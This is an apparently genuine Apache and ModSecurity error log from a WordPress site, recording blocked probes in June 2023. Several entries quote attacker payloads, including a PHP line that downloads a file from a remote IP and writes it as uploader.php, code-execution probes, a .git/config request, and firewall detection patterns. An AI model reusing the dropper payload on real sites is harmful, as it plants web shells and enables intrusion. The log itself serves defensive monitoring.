serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:14:56.390719 2023] [autoindex:error] [pid 11680:tid 140516239570688] [client 41.216.188.168:59294] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:14:58.042137 2023] [autoindex:error] [pid 11680:tid 140516003858176] [client 41.216.188.168:59296] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:15:00.810810 2023] [autoindex:error] [pid 11680:tid 140515987072768] [client 41.216.188.168:59300] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:15:02.348701 2023] [autoindex:error] [pid 10997:tid 140516154926848] [client 41.216.188.168:59304] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Jun 13 07:15:03.540826 2023] [autoindex:error] [pid 11680:tid 140516247963392] [client 41.216.188.168:59306] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Jun 14 02:41:34.279955 2023] [:error] [pid 23775:tid 140440380626688] [client 20.235.76.71:48704] [client 20.235.76.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZIlvLqdcQXqaaAl3mw_SYAAAAYU"], referer: www.google.com [Wed Jun 14 05:18:56.952096 2023] [autoindex:error] [pid 4857:tid 140417991378688] [client 41.216.188.168:36488] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Jun 14 06:10:24.738151 2023] [autoindex:error] [pid 4637:tid 140417982985984] [client 20.219.129.228:39970] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 14 09:14:05.679729 2023] [autoindex:error] [pid 4637:tid 140418041734912] [client 20.219.56.243:53946] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 14 11:15:35.048604 2023] [:error] [pid 4638:tid 140418083698432] [client 43.130.135.10:37262] [client 43.130.135.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZInnp-Y6IutJfqZRQ-WX2wAAAEU"], referer: www.google.com [Thu Jun 15 07:29:16.678591 2023] [autoindex:error] [pid 14512:tid 140478674609920] [client 43.163.226.138:48634] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Jun 15 09:51:14.232257 2023] [:error] [pid 14941:tid 140478820976384] [client 194.169.175.37:56066] [client 194.169.175.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "ZIslYoZdmS51itekA6aMPwAAAMI"] [Thu Jun 15 17:10:12.514612 2023] [:error] [pid 9043:tid 140478615860992] [client 193.201.8.40:43756] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/wp-admin.php"] [unique_id "ZIuMRG0fylPiM3vMFJK5QwAAARI"] [Thu Jun 15 20:56:27.806505 2023] [autoindex:error] [pid 9043:tid 140478599075584] [client 41.216.188.147:59838] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Thu Jun 15 21:33:46.766640 2023] [:error] [pid 9043:tid 140478657824512] [client 193.201.8.40:33592] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/core-stab/index.php"] [unique_id "ZIvKCm0fylPiM3vMFJLEWAAAAQ0"] [Fri Jun 16 06:57:01.087027 2023] [:error] [pid 13265:tid 140041410037504] [client 193.201.8.40:39560] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "ZIxODaABluSrgszb_ztz3gAAAMM"] [Fri Jun 16 16:16:37.734879 2023] [:error] [pid 13265:tid 140041410037504] [client 193.201.8.40:57766] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-content.php"] [unique_id "ZIzRNaABluSrgszb_zuKuQAAAMM"] [Fri Jun 16 23:02:58.185434 2023] [:error] [pid 13058:tid 140041300932352] [client 193.201.8.40:53288] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/animated-live-wall/plugin.php"] [unique_id "ZI0wcoEf82atP9CWNwxsvQAAAJA"] [Sat Jun 17 02:27:29.494986 2023] [autoindex:error] [pid 15409:tid 140041351288576] [client 20.198.5.191:35252] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Jun 17 06:21:27.620027 2023] [autoindex:error] [pid 22744:tid 140165813053184] [client 82.223.120.71:46950] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sat Jun 17 15:16:06.393106 2023] [:error] [pid 22744:tid 140165871802112] [client 193.201.8.40:50414] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZI4UhgP_UeirAuIbanPNagAAAMk"] [Sat Jun 17 15:16:06.404930 2023] [:error] [pid 22744:tid 140165922158336] [client 193.201.8.40:50416] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZI4UhgP_UeirAuIbanPNawAAAMM"] [Sat Jun 17 23:50:41.305454 2023] [:error] [pid 7453:tid 140165804660480] [client 193.201.8.40:36498] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/wp-includes.php"] [unique_id "ZI6NIcxVw_Hu_fIOtUeylQAAANE"] [Sat Jun 17 23:50:41.315160 2023] [:error] [pid 7614:tid 140165779482368] [client 193.201.8.40:36500] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/wp-includes.php"] [unique_id "ZI6NIfO7NDY8STxRwyaMJwAAABQ"] [Sun Jun 18 04:36:42.807180 2023] [:error] [pid 17802:tid 139797385422592] [client 193.201.8.40:54424] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:code. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:code: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/exs-church/fnc.php"] [unique_id "ZI7QKqJZGH10U2moBG1siQAAAIg"] 2023/06/18 10:45:34 [error] 17664#17664: *329697 access forbidden by rule, client: 193.32.126.215, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Jun 18 17:22:52.481233 2023] [:error] [pid 18069:tid 139797377029888] [client 193.201.8.40:54796] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:google: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/db-cache.php"] [unique_id "ZI-DvLrCVOxgR9WCN_iIBQAAAMk"] [Mon Jun 19 20:37:09.813639 2023] [:error] [pid 4883:tid 139867883235072] [client 172.190.59.194:42626] [client 172.190.59.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZJECxYAbxqqSGhH-Uju8FgAAAFY"], referer: www.google.com [Tue Jun 20 08:27:50.293494 2023] [autoindex:error] [pid 9488:tid 140347687073536] [client 52.140.118.35:48732] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Jun 21 01:57:23.630297 2023] [:error] [pid 3782:tid 140347569067776] [client 193.201.8.40:35062] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/classic/inc/index.php"] [unique_id "ZJKfU8XS1tbkq4ISUNik1gAAAIY"] [Wed Jun 21 06:06:22.642143 2023] [:error] [pid 9328:tid 140490838066944] [client 193.201.8.40:47266] [client 193.201.8.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:p1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:p1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-file-conficg.php"] [unique_id "ZJLZrm_RxSTsUXph5aWd1gAAAM8"] [Wed Jun 21 12:25:01.087789 2023] [autoindex:error] [pid 9064:tid 140490896815872] [client 193.201.8.40:42430] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching 